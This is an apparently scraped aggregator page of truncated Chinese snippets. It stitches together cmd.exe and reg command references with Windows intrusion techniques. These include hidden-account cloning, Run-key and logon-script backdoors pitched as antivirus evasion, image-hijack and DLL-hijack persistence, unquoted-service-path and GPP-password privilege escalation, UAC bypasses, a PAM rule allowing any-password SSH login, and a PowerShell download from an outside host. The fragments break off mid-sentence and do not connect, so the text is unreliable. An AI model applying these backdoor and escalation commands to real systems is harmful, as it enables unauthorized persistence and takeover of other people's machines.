cmd.exe 启动参数使用中的坑 在上面的例子中,我们的路径中不涉及到空格。我们知道,路径中有空格的话,在命令行中使用需要加上引号。.../frpc.ini " 以上,感谢 林德熙 挥泪踩出来的坑,详见: 如何在 CMD 启动的软件传入带空格的路径 - 林德熙 附 cmd.exe 的全部启动参数说明 启动 Windows 命令解释器的一个新实例...你 可以在机器上和/或用户登录会话上启用或停用 CMD.EXE 所有 调用的延迟扩展,这要通过设置使用 REGEDIT.EXE 的注册表中的 一个或两个 REG_DWORD 值: 1 2 3 4...你可以在计算上和/或 用户登录会话上启用或禁用 CMD.EXE 所有调用的完成, 这可以通过使用 REGEDIT.EXE 设置注册表中的下列 REG_DWORD 的全部或其中之一: 1 2 3 4...要停用 注册表中的某个字符,请用空格(0x20)的数值,因为此字符 不是控制字符。 如果键入两个控制字符中的一个,完成会被调用。
: 需通过在注册表中进行类似账号克隆的操作,分别将如下图所示的项分别导出为item1.reg和item2.reg: 在item1.reg中编辑F参数,通过复制Administrator在注册表中的...F参数将该其覆盖后保存: 在cmd命令中执行“net user hacker /del”,然后双击item1.reg和item2.reg重新将hacker用户写入到注册表中,此时在本地安全策略中已无hacker...在注册表中添加启动自动运行后门 下图所示为注册表中启动自动运行的目标目录: 通过reg add "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion...\Run" /vmyPersist /t reg_sz /d "C:\Users\Administrator\Desktop\persist.exe" 命令,可将启动自动运行的程序添加到注册表中的相应项...示例 schtasks /create /tn/tr /sc <什么时候运行 如 o 创建计划任务启动notepad(需要管理员权限) 对应的可以在 _Task Scheduler
注册表类: 普通注册表后门 在一般用户权限下,通常是将要执行的后门程序或脚本路径填写到如下注册表的键值中HKCU\Software\Microsoft\Windows\CurrentVersion\Run...Logon Scripts后门 注册表路径: HKCU\Environment\ 创建字符串键值: UserInitMprLogonScript cmd下操作: reg add "HKCU:\Environment...Logon Scripts是优先于很多杀毒软件启动(部分杀毒是优先于他启动)的,所以可以通过这种方式将powershell命令写到bat脚本中,达到免杀隐藏启动的效果。...注册表之CLR CLR全称为Common Language Runtime(公共语言运行库),是一个可由多种编程语言使用的运行环境。...或者使用powershell无文件加载也是可以的。
PortNumber 2、数据库提权 2.1 MySQL提权 利用mysql的几种提权方式,如udf提权、mof提权、启动项提权等。...3.2 可信任服务路径漏洞 当一个服务的可执行文件路径含有空格,却没有使用双引号引起来,那么这个服务就存在漏洞。根据优先级,系统会对文件路径中空格的所有可能进行尝试,直到找到一个匹配的程序。...3.3 不安全的注册表权限配置 如果低权限用户对程序路径所对应的键值有写权限,那么就可以控制这个服务,运行后门程序,从而获取权限。...(1)访问SYSVOL共享文件夹,搜索包含“cpassword”的XML文件,获取AES加密的密码。 ? (2)使用kali自带的gpp-decrypt进行破解 ?...6、令牌窃取提权 通过窃取令牌获取管理员权限,在MSF中,可以使用incognito实现token窃取。
当用户双击对应的程序后,操作系统就会给外壳程序(例如"explorer.exe")发布相应的指令,其中包含有执行程序的路径和文件名,然后由外壳程序来执行该程序。...事实上在该过程中,Windows还会在注册表的上述路径中查询所有的映像劫持子键,如果存在和该程序名称完全相同的子键,就查询对应子健中包含的"dubugger"键值名,并用其指定的程序路径来代替原始的程序...% /VE /T REG_SZ /D "%CD%\msg.dll" /F # 修改默认路径值为msg.dll的路径 cmd> 当前cmd下启动.net程序,比如:powershell,即可执行dll DLL...1、文件完整性检测 修改了默认的动态链接库后文件完整性发生变化,可以使用rpm等来校验 首先获取系统中的动态链接器的文件路径(interp段指定了动态链接器的位置) readelf -a /bin/ps...auth sufficient pam_rootok.so,所以只要PAM配置文件中包含此配置即可SSH任意密码登陆,除了su中之外还有chsh、chfn同样可以。
query 遇到空格的处理方法多少有些奇怪,整体用双引号引上不行,反斜线也不太行,得用双引号把空格引上 如果一个用户只是被创建了而没有登录,在注册表中可能是看不到这一项的,因此做实验的朋友们记得登录一次...注意 REG_MULTI_SZ 是多字符串值,也就是说表示多个字符串,字符串不能包含空格 Description:计划任务服务的描述信息,用于提供关于该服务功能的说明。...\.NET CLR Data\Performance 排查思路就是把服务的所有注册表项中包含 Performance 子项的,获取 Library 键的值,验证文件签名 通过 powershell...(如C:\Windows\System32)和系统路径(如PATH环境变量所指定的路径)中搜索。...这有助于防止使用容易猜测的密码,如123456、password等。 自定义验证规则:管理员可以定义自定义验证规则,以满足特定的安全需求。例如,要求密码包含特定字符、不允许使用特定单词或模式等。
笔者在最近一次钓鱼活动中忘记添加自启直接就重启了目标机器,导致权限丢失,很难受,所以决定自己撸一个一键维权的插件,避免再出现此类低级错误。 ?.../create是创建新任务,/TN是TaskName的简写,也就是新建的任务的名字,在系统必须唯一,/TR是TaskRun的简写,即为需要运行的程序的路径和文件名。...相比at来说,schtasks的优势在于可以周期运行,重复检索任务是否处于运行状态,可使用下面的命令删除: schtasks /delete /tn WindowsUpdate 注册表 windows系统的开机项位于注册表的...需要注意参数值与等号之间要有空格。使用Windows服务进行自启有个很有意思的地方,默认是以system权限启动,也是“提权”的一种不错的方式。...另外有个小坑,sc在powershell中传参有问题,执行不成功,必须在cmd里执行。笔者刚开始写插件是全程用bpowershell函数执行命令,在这儿卡了有一会儿,相当难受。
(使用Native API) 参考: 《渗透技巧——"隐藏"注册表的创建》 《渗透技巧——"隐藏"注册表的更多测试》 方法19:powershell配置文件 修改powershell配置文件,后门在powershell...: 使用py2exe 使用PyInstaller 使用方法和常见bug解决方法可参照参考链接 参考: 《本地密码查看工具LaZagne中的自定义脚本开发》 ---- Tips 38 普通用户权限向管理员权限的路径下写文件...Windows系统服务对应可执行文件的路径,如果路径包含普通用户的写权限,那么该服务可被用来提升权限 powershell代码: $ErrorActionPreference="SilentlyContinue...使用/D需要管理员权限 应用: 更改释放文件的路径 ---- Tips 51 powershell在执行脚本时传入参数 powershell -executionpolicy bypass -Command...---- Tips 66 通过powershell读取注册表获得所有用户的远程桌面连接历史记录 默认读注册表只能获取当前已登录用户的注册表信息,可通过reg load加载配置单元获得未登录用户的注册表配置
` 六、可爱的循环`for`命令 七、打开程序的`start`命令 八、CMD下切换目录`cd`命令 九、创建文件夹的命令`md` 十、操作注册表`reg`命令 前言 什么是CMD?...格式(管理员模式下,请将%i替换为%%i)for /l %i in (开始的地方,步长step,结束的地方) do 命令,结束的时候会停止到前一项,如(1,1,10)的循环为1~9。.../f 不用提示就强行覆盖现有注册表项。 /reg:32 指定应该使用 32 位注册表视图访问的注册表项。 /reg:64 指定应该使用 64 位注册表视图访问的注册表项。.../reg:32 指定应使用 32 位注册表视图访问 注册表项。 /reg:64 指定应使用 64 位注册表视图访问 注册表项。...示例: REG DELETE HKLM\Software\MyCo\MyApp\Timeout 删除注册表项 Timeout 及其所有子项和值 REG DELETE \\ZODIAC\HKLM\Software
system #当工具无法使用时,也可以手工查找,使用Windows内建工具icacls查看服务启动路径中写权限 例如:icacls “C:\Program Files” icacls “C:\Program.../1111.exe" C:\ScheduledTasks\Task1\1111.exe #等待计划任务执行 2.2可信任服务路径漏洞 简介:如果一个服务的可执行文件的路径没有被双引号引起来且包含空格,...原理:对于C:\Program Files\Some Folder\Service.exe文件路径中的每一个空格,windows都会尝试寻找并执行名字与空格前的名字向匹配的程序。...操作系统会对文件路径中空格的所有可能进行尝试,直到找到一个匹配的程序。...\SYSTEM\CurrentControlSet\Services注册表项中,服务对应的程序路径存储在HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\
system #当工具无法使用时,也可以手工查找,使用Windows内建工具icacls查看服务启动路径中写权限 例如:icacls “C:\Program Files” icacls “C:\Program.../1111.exe" C:\ScheduledTasks\Task1\1111.exe #等待计划任务执行 2.2可信任服务路径漏洞 简介:如果一个服务的可执行文件的路径没有被双引号引起来且包含空格,...原理:对于C:Program FilesSome FolderService.exe文件路径中的每一个空格,windows都会尝试寻找并执行名字与空格前的名字向匹配的程序。...操作系统会对文件路径中空格的所有可能进行尝试,直到找到一个匹配的程序。...当加载某些较高完整性级别进程时,会引用这些注册表项,从而导致进程加载用户控制的DLL,这些DLL包含导致会话权限提升的payload。
文件以将搜索路径定位到包含恶意DLL的地方。...此方法通常也被称为DLL侧加载 (6) 相对路径DLL劫持:将合法的应用程序复制(并有选择地重命名)与恶意的DLL一起放入到用户可写的文件夹中。在使用方法上,它与(签名的)二进制代理执行有相似之处。...实践出真知2 这里使用第三种方法进行实验,实验对象是eventvwr.msc,它是管理工具中的事件查看器,它依赖于mmc.exe来运行。...COR_PROFILER指定的注册表项,找到其dll路径并加载。...这里拿事件查看器举例 操作-》打开保存的目录-》文件目录路径处输入powershell-》弹出高权限powershell 以此内推,还有很多相似的管理工具可以这样利用 注册表劫持 Fodhelper.exe
),回滚操作后,计划任务恢复,排查发现是添加Rpc\internet注册表(reg add HKLM\SOFTWARE\Microsoft\Rpc\internet)导致的。...\Microsoft\Rpc\Internet | Remove-Item -force -Confirm:0"以上复原135端口的命令适用所有Windows系统下面单独说下reg delete命令执行...reg delete "HKLM\SOFTWARE\Microsoft\Rpc\Internet" /f 删Rpc\Internet报没权限,2008R2、2012R2打开注册表循着路径找到Rpc\Internet...-i -s reg delete "HKLM\SOFTWARE\Microsoft\Rpc\Internet" /f【只有一块网卡的CVM,关闭139端口】powershell两行代码执行后重启机器生效...\NetBT\Parameters\Interfaces\$netcardGUID /v NetBIOSOptions /T REG_DWORD /D 2 /F【只有一块网卡的CVM,复原139端口】powershell
在渗透测试中遇到 Windows 的概率是非常大的,那么在拿到一台服务器权限之后,通常会获得一个 shell,想要进行下一步渗透,几乎都是需要通过在 shell 中使用 Windows 的命令来进行渗透的...' 显示服务信息 sc query 显示具体的服务信息(包括二进制路径和运行使用) sc qc Spooler 找出文件名字包含 password 的文件 findstr /si 'password'...Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 12345 /f 注册表操作 查找注册表中的密码 reg query HKLM /f..." 使用 powershell 下载文件 powershell -c "(new-object System.Net.WebClient).DownloadFile('http://blabla.com...,看看执行的结果,了解一下这些命令的作用,看如何在实际的渗透中应用,话不多说,有好文章的给我投稿呦。
要查找包含字“FOR”的所有行(前面可有任意数量的空格,如:计算机程序中的循环),并包括每次出现的行号,请键入:findstr /b /n /c:"*FOR" *.basreg import将包含导出的注册表子项、项和值的文件复制到本地计算机的注册表中。...对于远程计算机,\\ComputerName\PathToSubkey 中的子项路径前包含计算机名称。忽略 ComputerName 会导致默认对本地计算机进行操作。以相应的子目录树开始路径。...unload使用 reg load 操作删除已加载的部分注册表。...对于远程计算机,\\ComputerName\PathToSubkey 中的子项路径前包含计算机名称。忽略 ComputerName 会导致默认对本地计算机进行操作。以相应的子目录树开始路径。
choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。 使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。..._07\bin” /f c.如果注册表的名称有空格,或者数据用特殊符号时 reg add “%SoftWareHome2%\HelpCommands” /v “01:Online Documentation...” /f 这里用“/ve”来代替一般修改时的“/v 变量名”,即可修改默认值了 3) 删除注册表的内容 双引号里面的是注册表的目录,下面两句将删除这目录下的所有信息 reg delete “HKEY_CURRENT_USER...\Software\RealVNC” /f reg delete “HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC” /f 双引号里面的是注册表的目录,下面一句将删除这目录下指定的某个信息...reg delete “HKEY_LOCAL_MACHINE\Software\RealVNC” /v VNC_Server /f 4) 注册表的常用位置 a.系统启动项: [HKEY_LOCAL_MACHINE
choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。 使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。.../d “%cd%\jre1.6.0_07\bin” /f c.如果注册表的名称有空格,或者数据用特殊符号时 reg add “%SoftWareHome2%\HelpCommands” /v “01...%” /f 这里用“/ve”来代替一般修改时的“/v 变量名”,即可修改默认值了 3) 删除注册表的内容 双引号里面的是注册表的目录,下面两句将删除这目录下的所有信息 reg delete “HKEY_CURRENT_USER...\Software\RealVNC” /f reg delete “HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC” /f 双引号里面的是注册表的目录,下面一句将删除这目录下指定的某个信息...reg delete “HKEY_LOCAL_MACHINE\Software\RealVNC” /v VNC_Server /f 4) 注册表的常用位置 a.系统启动项: [HKEY_LOCAL_MACHINE
通俗的说,如果一个服务的可执行文件的路径(带空格)没有被双引号引起来,那么这个服务就有漏洞。...此时,假如能上传一个适当命名的后门程序,那么当服务重启的时候就会以system权限运行(大多数情况下) 所以,理论上一个服务的可执行文件的路径没有用双引号封闭,且包含空格,那么就是存在漏洞的 检测是否存在漏洞...权限运行的,所以系统在解析服务的二进制文件对应的文件路径中的空格的时候也会以系统权限进行解析。...1.Metasploit下的实战利用 1.先检测目标主机是否存在该漏洞。理论上讲,如果一个服务的可执行文件的路径没有用双引号封闭,并且包含空格,那么这个服务就是有漏洞的。...,并且路径中包含空格。
0x00前言 我在最近的学习过程中,发现PowerShell的命令的历史记录有时会包含系统敏感信息,例如远程服务器的连接口令,于是我对PowerShell的的历史记录功能做了进一步研究,总结一些渗透测试中常用导出历史记录的方法...(控制面板\程序\程序和功能)有显示:Package Management Preview - x64 Package Management Preview - x64的注册表路径为HKEY_LOCAL_MACHINE...删除注册表项的CMD命令: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{57E5A8BB-41EB-4F09...0x03防御建议 如果使用高版本的视窗系统,如Win10,默认PowerShell的版本为5.0,会记录PowerShell的的命令,建议定时进行清除,位置:%appdata%\Microsoft\Windows...对于低版本的Powershell的,如果命令中包含敏感信息(如远程连接的口令),需要及时清除,命令为:Clear-History 对于cmd.exe的,如果命令中包含敏感信息(如远程连接的口令),需要及时清除
传统的恶意软件(例如.exe)攻击感染一个系统之前会把恶意文件(例如exe)复制到目标磁盘中并修改注册表并连接到此文件来达到一个长期隐藏的目的,无文件落地攻击是指即不向磁盘写入可执行文件,而是以脚本形式存在计算机中的注册表子项目中...传统的恶意软件攻击流程: 1.投放恶意PE(可移植可执行文件)到目标磁盘驱动器中 2.执行 3.长期隐藏-需要修改注册表并连接到此恶意PE。...使用Cobalt strike生成一个木马放在WEB中 然后在目标中调用powershell远程加载执行我们的恶意ps1,然后在cobalt strike中可以看到已经回连上线了 ?...1>nul 2>&1 reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00 /f 1>nul 2>&1 reg delete HKEY_CURRENT_USER...这里使用cobalt strike 中的恶意com script,一样我们放在web服务器中 这个位置更改成我们的远程连接: ? 但是我这里利用不了。
领取专属 10元无门槛券
手把手带您无忧上云